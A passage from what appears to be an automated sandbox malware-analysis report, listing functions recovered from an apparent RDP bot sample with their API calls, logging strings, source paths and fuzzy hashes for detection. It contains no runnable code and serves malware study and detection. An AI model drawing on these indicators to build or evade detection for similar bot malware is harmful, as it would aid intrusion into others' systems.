                    Function 00007FF8BFB59BC4 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 192registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CloseDeleteOpenValuefflushfwrite
                    • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                    • API String ID: 3240087161-1648311886
                    • Opcode ID: 16f3fd5775081d4d7eaeecf68b61d1447b8a99dc193d88db3259e2a74f98e674
                    • Instruction ID: 00a02803008ce998781a68a061b071b5f5a8bb39e1575bff3e1280bc8f8de2a4
                    • Opcode Fuzzy Hash: 16f3fd5775081d4d7eaeecf68b61d1447b8a99dc193d88db3259e2a74f98e674
                    • Instruction Fuzzy Hash: F8817E6190C75B91FA74A7CCA9A02B87390AF047C4F441132DB5E46BE5EE6DF989C342
                    Function 00007FF8BFB5ACC0 Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 207memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwrite
                    • String ID: (hnd != NULL)$(sid != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                    • API String ID: 1151404744-2809655389
                    • Opcode ID: b5677b69ba870fc38f1c983ff4ac00a339a5f2744ecaf2e767faefe0bc734db1
                    • Instruction ID: c01be474749a4c2518579589d92425f3f1f765d0adea733dd7ba58a569ec049d
                    • Opcode Fuzzy Hash: b5677b69ba870fc38f1c983ff4ac00a339a5f2744ecaf2e767faefe0bc734db1
                    • Instruction Fuzzy Hash: A4915C62B0D64691FB606B9CE4603B9B356AF89BD5F194037DB0E5B6D0DE3CF8868301
                    Function 00007FF8BFB5C361 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 187synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                    • String ID: (pi != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                    • API String ID: 1879646588-3634134927
                    • Opcode ID: 8291d4b9401c204577f6d685d04ad4ed4d31b8b9359bcd817a2fc134ff056c08
                    • Instruction ID: ec5f19ebd02eaaf6fb17396f5d9b7c2319018c5e3e591c17350b4d04cdfe0bb6
                    • Opcode Fuzzy Hash: 8291d4b9401c204577f6d685d04ad4ed4d31b8b9359bcd817a2fc134ff056c08
                    • Instruction Fuzzy Hash: 10814FB2E0C11392FB605BECA861AB963929F007DCF161032CF5E57694DE6CBD818782
                    Function 00007FF8BFB54B69 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                    • API String ID: 1799206407-2463373822
                    • Opcode ID: 9cbf1e3839263a5b4d41a35af55a09d577e3657ec55f384be017b7f78778957c
                    • Instruction ID: a50bb1392ab85774c954ec4311fd6b4059a5cb4b6204382ec6eb264e270b2535
                    • Opcode Fuzzy Hash: 9cbf1e3839263a5b4d41a35af55a09d577e3657ec55f384be017b7f78778957c
                    • Instruction Fuzzy Hash: 395159A5A0C607D2FA289BCEA8727B873507F447C4F180132CB5E07AD1EE6DB999D301
                    Function 00007FF8BFB58042 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241memorystringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                    • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                    • API String ID: 1423203057-3539035513
                    • Opcode ID: aa4d9cc00176d7a57371ed8f69fdf9031eaa5487daa49c4f6a7fa1dc826dc5fa
                    • Instruction ID: f92ce2b78bdb6d3fb8958b37c3c8eb9350aed0a2fc7240df2e92a08107402e3e
                    • Opcode Fuzzy Hash: aa4d9cc00176d7a57371ed8f69fdf9031eaa5487daa49c4f6a7fa1dc826dc5fa
                    • Instruction Fuzzy Hash: FDA1CD62B0DA8291FE609B89E8607B96B51AF54BC4F488032EF4D4BB95DE7DF546C300
                    Function 00007FF8BFB54088 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 191COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastMetricsSystem$fflushfwrite
                    • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                    • API String ID: 144387239-4168848430
                    • Opcode ID: ace749d326b6e2610a0a50e090a0a54db6a09221becd43ceb88e30b1573064ce
                    • Instruction ID: 34b62c56a0c401493c8b4e2d28fef3c0e606e5822e88daad61c80f1847e10034
                    • Opcode Fuzzy Hash: ace749d326b6e2610a0a50e090a0a54db6a09221becd43ceb88e30b1573064ce
                    • Instruction Fuzzy Hash: 6E714E61F1C547D6FB6897CDA8323786B956F643C8F044032D70E8A6A4DEADF998C341
                    Function 00007FF8BFB594F4 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 116registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CloseCreate
                    • String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                    • API String ID: 2932200918-412249795
                    • Opcode ID: 8449c3d8bed7d6e30d06613ddc14b67a39feaac4f3edd286ae77be3f02f688a0
                    • Instruction ID: 40b5e49d425f11083cda17c3dc7d1d3ef02c59c16e23498b5745995ab98502af
                    • Opcode Fuzzy Hash: 8449c3d8bed7d6e30d06613ddc14b67a39feaac4f3edd286ae77be3f02f688a0
                    • Instruction Fuzzy Hash: 6251AC62E0C69391FB308B9CE9607B9A390AF047D4F481132DF9D576A8DE2CFD988741
                    Function 00007FF8BFB57815 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                    • API String ID: 39653677-3852240402
                    • Opcode ID: 38522c53b2a05fefa3dbf257f3564a5f1986d57605e009d13c0039893290e6b1
                    • Instruction ID: 2a58d6cb86c8586f2f43b78f5baaa09f3108c28ad2397ab0c14c096d8cdfbe18
                    • Opcode Fuzzy Hash: 38522c53b2a05fefa3dbf257f3564a5f1986d57605e009d13c0039893290e6b1
                    • Instruction Fuzzy Hash: 79417E61A0DA8B61FB109F9DE4207B8B752BF407C4F984132DB8E0B696DE3DE55AC340
                    Function 00007FF8BFB58C31 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Heap$Processstrlen$AllocFree
                    • String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                    • API String ID: 1318626975-3508512667
                    • Opcode ID: 486d9d8cd7400a46774a7d5ec7d34aa6c419ad910dcea3cbc941c0966a8d206d
                    • Instruction ID: d2ad5d48dcdeb526be765cb25860c1d8c112c6b576f6112c802a04bbaf387efa
                    • Opcode Fuzzy Hash: 486d9d8cd7400a46774a7d5ec7d34aa6c419ad910dcea3cbc941c0966a8d206d
                    • Instruction Fuzzy Hash: 71318E61A0EA47A5FA519FD9A8207B9B3A0AF40BC4F485031DF4E17B95DF3CF9568380
                    Function 00007FF8BFB57495 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                    • API String ID: 497672076-345319545
                    • Opcode ID: d63bbd13eff69c04316dcb5a6a255e5cf3d25b2eb49312f28a747831b048db1c
                    • Instruction ID: 38ed0b3c24f97fa1d647c021c49c506ffb2e170f8bf8469dddb672addfe7cf9b
                    • Opcode Fuzzy Hash: d63bbd13eff69c04316dcb5a6a255e5cf3d25b2eb49312f28a747831b048db1c
                    • Instruction Fuzzy Hash: 64413D61F0C54BD1FA248B9DF960AB86750EF507D8F244232DB1E176E4EE6CF9858701
                    Function 00007FF8BFB53F02 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorGlobalLastMemoryStatus
                    • String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
                    • API String ID: 3848946878-1815531218
                    • Opcode ID: 7d5aebcb42e40b36646edad5963f267819099b87d91964b5685cf8d60b2208d5
                    • Instruction ID: b23ce27a909b7122c9f53e0161b83f0f15523479d8c79847422726f144de3fff
                    • Opcode Fuzzy Hash: 7d5aebcb42e40b36646edad5963f267819099b87d91964b5685cf8d60b2208d5
                    • Instruction Fuzzy Hash: 7C312E12E1E38782FB2497DC94B03BC63619F55388F685132D70E06291DF6EF9E6D602
                    Function 00007FF8BFB56B55 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleSize
                    • String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                    • API String ID: 3555958901-3761180060
                    • Opcode ID: 8ed85f3a823fb0401711bed7f93783fe5b2ffe5315476a1ad81378396d65e5d0
                    • Instruction ID: ecab3fd5d29b6702d10663b8b05bcbb27f5ba5bcee5d25009b4e1e0b69c96630
                    • Opcode Fuzzy Hash: 8ed85f3a823fb0401711bed7f93783fe5b2ffe5315476a1ad81378396d65e5d0
                    • Instruction Fuzzy Hash: CA615F95E2C16782F77047DCE4653B863529F003E8F29463ACB1E9B6D0DE2DBC859382
                    Function 00007FF8BFB57C92 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorFileLastModuleName
                    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                    • API String ID: 2776309574-787847008
                    • Opcode ID: 32b99ea24dc9d0ee07b2fd236634eb675507722fcaec698bfe31318cc9cdeac0
                    • Instruction ID: 7f9d63f7261e4cbebac676d22ea9f5170cbbbf14653f9c15f626dc0739e3b4b6
                    • Opcode Fuzzy Hash: 32b99ea24dc9d0ee07b2fd236634eb675507722fcaec698bfe31318cc9cdeac0
                    • Instruction Fuzzy Hash: 463141A2B18A4B61FB108B9CE9207B47350BF107C8F941131DB4E476A1EE7CF955C780
                    Function 00007FF8BFB587C0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 70stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: _errno$strtol
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                    • API String ID: 3596500743-1951032453
                    • Opcode ID: 2f5494c49b798f33c18bb42bf049c878fcc72d8fb29e1a49407fdbb2030ba05b
                    • Instruction ID: 117a02d20861d4cd56763d7baae97ac150437f21991e8ef8cbd511893c0f1706
                    • Opcode Fuzzy Hash: 2f5494c49b798f33c18bb42bf049c878fcc72d8fb29e1a49407fdbb2030ba05b
                    • Instruction Fuzzy Hash: B1217A22A08647A2F7519B99E850BAAB761FB447C8F445132EF4C4BB65DF3CE896C700
                    Function 00007FF8BFB51B6A Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 148stringmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Heapstrlen$FreeProcessstrcmpstrcpy
                    • String ID: ($-RGMLWD-$ORRE$exe
